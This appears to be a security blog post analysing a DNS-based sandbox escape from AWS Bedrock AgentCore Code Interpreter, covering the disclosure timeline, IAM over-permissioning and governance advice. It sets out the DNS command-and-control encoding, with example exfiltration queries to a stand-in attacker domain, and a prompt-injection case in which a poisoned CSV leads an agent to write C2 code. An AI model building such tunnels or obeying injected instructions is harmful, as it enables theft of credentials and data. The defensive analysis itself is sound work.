On March 16, BeyondTrust's Phantom Labs published research that should be mandatory reading for anyone deploying agentic AI on cloud infrastructure. The team demonstrated a full sandbox escape from AWS Bedrock AgentCore's Code Interpreter using nothing more than DNS queries. They achieved bidirectional command-and-control, interactive reverse shell access, and data exfiltration from S3 buckets, all from inside an environment that AWS marketed as having "complete isolation with no external access."

I want to break down what happened here technically, why it matters for AI governance, and what it reveals about the assumptions baked into how we think about agent isolation today.

What AWS AgentCore Code Interpreter Actually Does

If you have ever uploaded a CSV to ChatGPT and asked it to generate charts or statistics, you have used a code interpreter. The LLM does not do the math itself. It generates Python code, executes it inside a sandboxed runtime, and returns the results.

AWS Bedrock AgentCore Code Interpreter does the same thing at enterprise scale. It allows AI agents and chatbots to execute Python, JavaScript, or shell code on behalf of users. The code runs inside Firecracker microVMs, the same lightweight KVM-based virtual machines that power Lambda functions and Fargate tasks.

AgentCore offers three network modes for these code execution environments:

Public Mode - Full internet access, no restrictions. Intended for development.
Sandbox Mode - Supposed to provide complete network isolation. The production recommendation for most workloads.
VPC Mode - Runs inside a customer VPC with full network control. Requires the most configuration.

The assumption most organizations made was straightforward: Sandbox Mode means no network access, so even if code execution is compromised, the blast radius is contained. That assumption was wrong.

The Bypass: DNS as a Covert Channel

Phantom Labs discovered that Sandbox Mode does not block DNS resolution. The Code Interpreter can make A and AAAA record queries to arbitrary domains. AWS left DNS open to support S3 operations, since S3 endpoints require name resolution to function.

That design choice creates a covert channel. DNS is one of the most well-documented exfiltration vectors in offensive security. If you can resolve arbitrary domain names, you can encode data in the query itself (as subdomain labels) and receive data back in the response (encoded in A record IP addresses). It is slow, but it works. And it is extremely difficult to detect without dedicated DNS monitoring infrastructure.

The Phantom Labs team built a full command-and-control protocol on top of this. Here is how their C2 architecture works:

Command Delivery (Server to Client)

The attacker encodes commands as base64, splits them into 3-character chunks, and stores each chunk as an IP address in DNS A records. The encoding is clever: the first octet signals whether more chunks follow (10) or this is the last chunk (11), and octets 2 through 4 carry the ASCII values of the three base64 characters.

For example, encoding the command whoami (base64: d2hvYW1p):

c0: 10.100.50.104  → "d2h"
c1: 10.111.89.87   → "oYW"
c2: 10.49.112.0    → "1p"
c3: 11.105.0.0     → "i" (last chunk)

The client inside the sandbox polls the attacker's DNS server by querying c0.sess_<id>.c2.attacker-domain.com, walks through each chunk, reconstructs the base64 string, decodes it, and executes the command.

Data Exfiltration (Client to Server)

Output goes the other direction: base64-encoded and embedded as subdomain labels in DNS queries. Multiple cache-busting fields (timestamp, sequence number, command ID) ensure every query is unique and actually reaches the attacker's DNS server instead of being served from cache:

1.1.22.1234.MjAyNS0wOC0yMSAyMDoyMDo1NA-.1.sess_abc123.c2.attacker-domain.com
↑ ↑ ↑  ↑    ↑                              ↑ ↑
│ │ │  │    └── Base64 output chunk          │ └── Session ID
│ │ │  └─────── Timestamp (cache bust)       └──── Cmd sequence
│ │ └────────── Total chunks
│ └──────────── Chunk number
└────────────── Command sequence

Large outputs get split across multiple DNS queries, with a 60-character maximum per DNS label (the protocol limit is 63). The attacker's DNS server reassembles the chunks into the full output.

Completing the Kill Chain

With bidirectional communication established, the researchers demonstrated the full attack sequence: executing arbitrary commands as the genesis1ptools user inside the sandbox, listing S3 buckets accessible via the Code Interpreter's IAM role, and exfiltrating actual file contents including PII, API credentials, and financial data.

All of this happened while the sandbox reported "no network access."

The IAM Problem Underneath the DNS Problem

The sandbox bypass alone would be concerning. But it becomes significantly worse when you look at how IAM roles are typically assigned to AgentCore workloads.

AWS requires that the trust policy on the IAM role match the service principal bedrock-agentcore.amazonaws.com. The problem is that this same principal is shared across three different AgentCore components: Code Interpreter, Runtime, and Gateway. Each has fundamentally different permission requirements, but they all assume roles with the same trust relationship.

In practice, this means the role assigned to Code Interpreter often carries permissions intended for other parts of the stack. A Gateway role might need secretsmanager:GetSecretValue to fetch API keys. A Code Interpreter executing user-supplied Python certainly should not have that permission. But because the trust policy does not differentiate between components, it frequently does.

The situation gets worse. The AgentCore Starter Toolkit Default Role, which AWS documented and which other open-source AgentCore examples referenced, grants full S3 read access across all buckets in the account, full DynamoDB access, and full access to Secrets Manager. This is not least privilege. This is a blast radius problem waiting for a trigger, and the DNS bypass provides exactly that trigger.

How Code Gets Executed in the First Place

A reasonable counterargument is that the attacker still needs code execution inside the sandbox. How realistic is that?

In traditional compute environments, achieving arbitrary code execution is the hardest part of most attack chains. In AI agent environments, it may be the easiest.

Phantom Labs identified several realistic vectors:

Prompt injection. Direct or indirect. An attacker crafts input that manipulates the AI into generating code with exfiltration logic embedded in it. In their proof-of-concept, the team embedded malicious instructions inside a CSV file. When the AI agent read the CSV as part of its prompt context, it treated the embedded instructions as legitimate and generated Python that polled the C2 server. The AI thought it was following the user's data analysis request. It was actually executing an attacker's payload.

Supply chain compromise. Code Interpreter ships with 270+ third-party Python dependencies. pandas, numpy, and the rest of the data science stack. A single compromised package could establish C2 on import without any prompt injection required.

Malicious prompt design. When AI generates Python for data analysis, prompts can be constructed so that the generated code includes exfiltration logic that looks legitimate on the surface. A request to "analyze this data and send a summary to my analytics endpoint" could be crafted to route data through a DNS tunnel instead.

The point here is that code interpreters exist specifically to execute dynamically generated code. The input to that code generation is, in many cases, user-controlled. The sandbox was supposed to be the safety net that made this acceptable. Phantom Labs demonstrated that for DNS-based attacks, it was not.

AWS's Response and What It Tells Us

The disclosure timeline is worth reading carefully.

Phantom Labs reported the vulnerability to AWS via HackerOne on September 1, 2025. AWS acknowledged it within a day, reproduced it by September 4, and deployed an initial fix by November 1. Then, on November 17, AWS communicated that "the initial fix was rolled back due to other factors." By December 23, AWS decided not to fix the issue at all and instead updated their documentation to clarify that Sandbox Mode permits DNS resolution.

AWS awarded the researcher a $100 gift card to the AWS Gear Shop and a CVSSv3 score of 7.5.

The decision to reclassify this as a documentation issue rather than a security defect is telling. From AWS's perspective, DNS resolution in Sandbox Mode is intended behavior, required for S3 operations. The documentation previously said "complete isolation with no external access." It now says "limited external network access."

Technically, AWS is correct that DNS resolution was a deliberate design choice. But the security implication is that every organization running Code Interpreter in Sandbox Mode since the service launched has been operating under a false isolation assumption. The word "sandbox" carries a specific expectation in security, and DNS exfiltration violates that expectation regardless of whether DNS resolution was intentionally enabled.

What This Means for AI Governance

I keep coming back to a core problem in how organizations are approaching AI governance: we are importing trust assumptions from traditional compute models into agent architectures where those assumptions do not hold.

In a traditional application, the code is written by developers, reviewed in pull requests, scanned by SAST tools, and deployed through a controlled pipeline. The code that runs in production is the code that was approved to run in production.

In an agent architecture, the code is generated dynamically by an LLM, shaped by user input, and executed immediately. The code that runs was never reviewed by a human. It was never scanned. It was never approved. The sandbox is the entire security model.

When the sandbox has a covert channel in it, the entire security model has a covert channel in it.

This is exactly the kind of failure that governance frameworks need to account for at the architectural level. A few specific implications:

Isolation Claims Need Verification, Not Trust

If your governance program relies on a cloud provider's isolation guarantee as a control, you need to validate that guarantee independently. "Sandbox Mode" is a marketing term before it is a security control. What protocols are allowed through? What IAM permissions does the runtime inherit? What metadata services are accessible? These are questions that should be part of every agent deployment review.

IAM Scoping for Agent Runtimes Needs Its Own Policy

The shared service principal problem in AgentCore is not unique. Most agent-as-a-service platforms have some version of this, where the agent runtime inherits broader permissions than it needs because the IAM model was not designed with dynamic code execution in mind. Governance programs should mandate that agent runtimes receive purpose-scoped roles with explicit deny policies for services they should never touch.

DNS Monitoring Becomes a Governance Requirement

If your organization is running AI agent workloads in any cloud environment, DNS telemetry should be part of your monitoring stack. This is true whether you are using AgentCore, Azure AI, Google Vertex, or any other platform. DNS-based C2 and exfiltration have been well-known techniques for over a decade. The fact that they are now applicable to AI agent runtimes means that DNS anomaly detection belongs in your AI governance controls, not just your SOC playbooks.

The Shared Responsibility Model Needs Updating for Agents

AWS's response to this disclosure highlights a gap in the shared responsibility model as applied to AI services. AWS sees DNS resolution as intended functionality. Customers saw Sandbox Mode as a complete isolation boundary. Both interpretations are reasonable. Neither party was explicitly wrong. But the customer carried the risk.

For governance leaders, this means you cannot outsource isolation guarantees to your cloud provider and check the box. You need compensating controls, independent verification, and an explicit understanding of what "sandbox" actually means at the protocol level for every agent service you deploy.

Practical Recommendations

For organizations currently running AWS Bedrock AgentCore Code Interpreter workloads:

Inventory your Code Interpreter instances immediately. Know which ones are running in Sandbox Mode, which IAM roles they are using, and what those roles have access to.

Migrate sensitive workloads to VPC Mode. This is the only mode that provides genuine network isolation and control over DNS resolution. Yes, it requires more configuration (VPC endpoints, security groups, network ACLs, Route53 Resolver DNS Firewall). That configuration is the actual security control. The convenience of Sandbox Mode was always the risk.

Apply least-privilege IAM immediately. Create dedicated roles for Code Interpreter that are scoped to exactly the resources the interpreter needs. Use explicit deny statements for services like Secrets Manager, IAM, and STS that a code interpreter should never access. Do not reuse roles across AgentCore components.

Deploy DNS monitoring. If you cannot immediately migrate to VPC Mode, implement DNS query logging and anomaly detection. Look for high volumes of queries to unusual domains, long subdomain labels (indicative of data encoding), and periodic polling patterns consistent with C2 beaconing.

Review your prompt injection controls. Input guardrails on the AI agent layer are now load-bearing security controls if the sandbox layer is permeable. Ensure that your agent implementations include input validation, output filtering, and model-level safeguards against instruction injection.

The Bigger Picture

This research from Phantom Labs is excellent work, and the fact that they open-sourced the proof-of-concept tooling (available on GitHub) means other organizations and researchers can test their own environments. Credit to Kinnaird McQuade and the Phantom Labs team for responsible disclosure and thorough documentation.

But the broader lesson here extends well beyond AWS. Every cloud provider offering agent-as-a-service capabilities is making isolation decisions that their customers may not fully understand. Every sandbox has design tradeoffs. Every "no network access" configuration has exceptions.

The organizations that will get this right are the ones who treat isolation as something to verify, not something to assume. That verification needs to be baked into governance processes, not left to the security team to discover after the fact.

We are building increasingly autonomous systems and handing them increasingly broad permissions. The security boundaries around those systems need to be as rigorous as the capabilities we are giving them. Right now, for a lot of organizations, they are not even close.